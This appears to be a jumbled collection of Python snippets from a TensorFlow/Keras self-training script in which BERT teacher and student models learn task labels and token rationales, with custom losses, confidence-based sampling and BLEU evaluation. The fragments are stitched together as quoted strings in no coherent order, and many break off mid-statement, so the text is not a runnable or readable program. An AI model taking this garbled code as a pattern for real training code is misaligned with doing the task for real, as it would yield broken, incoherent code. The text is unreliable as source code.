y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev,", "= deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test,", "X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, 
y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\":", "= class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model", "y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test),", "= model logger.info (\"Model file loaded from {}\".format(model_file)) break elif 'mtl' in type_", "X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif", "y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg' in type_: test_acc", "in type_: logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce =", "[y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0],", "Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy()", "#y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0],", "y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5,", 
"y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred", "task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc =", "y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc))", "\"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue if", "verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc", "truth_1, truth_0 = 0, 0, 0, 0 for i in range(len(test_pred)): temp_p, temp_t,", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss =", "y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)])", "models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0,", "for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0],", "\"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint' in type_):", "None if 'mtl' in 
type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc,", "logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0],", "0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file)", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None if", "tensorflow.keras as K import tensorflow.keras.backend as kb import tensorflow_addons as tfa from focal_loss", "rationales u-r if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\":", "= set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and y to train and", "= SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss =", "fp = 0, 0, 0 pred_1, pred_0, truth_1, truth_0 = 0, 0, 0,", "model n times with different initialization to select best base model based on", "'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 
'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint'", "None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:],", "logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]],", "score of rationales on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of", "if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best)", "acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred =", "{}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score", "average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task", "np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids':", "import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics", "np.full((len(y_test),len(labels)), 
1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev,", ": {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch,", "\"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:,", "else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] y_val", "X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train =", "> unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for class {} :", "y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg' in type_: test_acc =", "logger.info(\"No sampling at the moment; choose all the unlabeled examples\") X_batch = {\"input_ids\":", "np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0],", "for word in temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp", "temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp", "acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\":", "= model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, 
axis=-1).numpy(), axis=-1)", "None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0:", "os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model", "epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in", "model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl'", "set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (teacher", "1.0] ''' if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] if", "y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg =", "#logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False,", "hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, 
tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint':", "np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc >", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels =", "None, None if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val =", "y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from unlabeled set if 'uni' in", "type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]),", "log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in", "if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue if 'mtl' in", "> max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc", "type_: loss_weights = [1.0, 0.0] else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None,", "attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample =", "\"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\":", "\"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], 
\"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:],", "at the moment; choose all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\":", "json.dump(data, f) model_student = None # model_task for epoch in range(unsup_epochs): logger.info (\"Starting", "in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc,", "model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5,", "'.join(temp_t)) for word in temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info", "temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] ==", "in temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 
'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def", "{}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True,", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight)", "or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels))", "models.construct_teacher_joint(TFModel, Config, 
pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels", "j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to", "class {} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size,", "import tensorflow as tf import tensorflow.keras as K import tensorflow.keras.backend as kb import", "0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "[y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc", "task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev],", "task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, 
y_pred1,", "= np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: if", "= (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001)", "verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:],", "0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce =", "'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg'", "out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] y_val =", "logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task):", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp'", "teacher model for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0,", "X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size]", "= [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1):", "sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred,", "logger.info(\"Best token acc score: 
{}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1)", "moment; choose all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\":", "attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1]", "= [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2]", "logger.info (\"Model file loaded from {}\".format(model_file)) continue if 'mtl' in type_ : acc,", "out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred =", "test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set", "sampling at the moment; choose all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices],", "for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:],", "logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc,", "patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved", "y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out", "type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights =", "'_noexp' in type_: 
loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_:", "type_ == 'decoupled' or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices],", "= models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0,", "= {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf =", "= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best", "weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 +=", "rationales on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on", "in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices =", "[1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0,", "data on teacher model for run {}: {}\".format(counter, test_pred)) tp, fn, fp =", "of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum()", "l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss", "'joint': 
rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_:", "= task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc", "{} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False)", "axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred,", "in type_: rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else:", "model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file", "1.0, 1.0] ''' if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0]", "from unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size <", "y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2]", "y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight)", "{}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred = model_student.predict(X_test)", "'_r_' in type_: #re-weight rationales 
X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels", "\"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in range(len(y_pred))]) acc", "type_ == 'joint': rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2)", "''' else: logger.info(\"No sampling at the moment; choose all the unlabeled examples\") X_batch", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session()", "X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0],", "patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, 